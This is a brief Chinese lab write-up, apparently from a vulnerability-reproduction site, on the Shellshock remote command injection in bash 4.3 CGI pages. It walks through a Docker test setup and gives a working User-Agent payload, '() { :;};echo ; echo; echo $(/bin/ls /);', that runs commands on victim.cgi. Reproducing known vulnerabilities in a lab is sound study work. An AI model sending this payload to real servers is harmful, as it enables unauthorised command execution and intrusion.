命令注入 (CVE"/>
Shellshock 远程命令注入 (CVE
漏洞描述
Safe.cgi 由最新版本的 bash 生成,victim.cgi 是 bash4.3 生成的页面,容易受到 shellshock 的影响。
我们可以在访问 victim.cgi 时在用户代理字符串中发送包含我们的有效负载,并且命令成功执行
漏洞环境及利用
搭建docker环境
访问ip:8080/victim.cgi 抓包修改UA头
() { :;};echo ; echo; echo $(/bin/ls /);
更多推荐
Shellshock 远程命令注入 (CVE
发布评论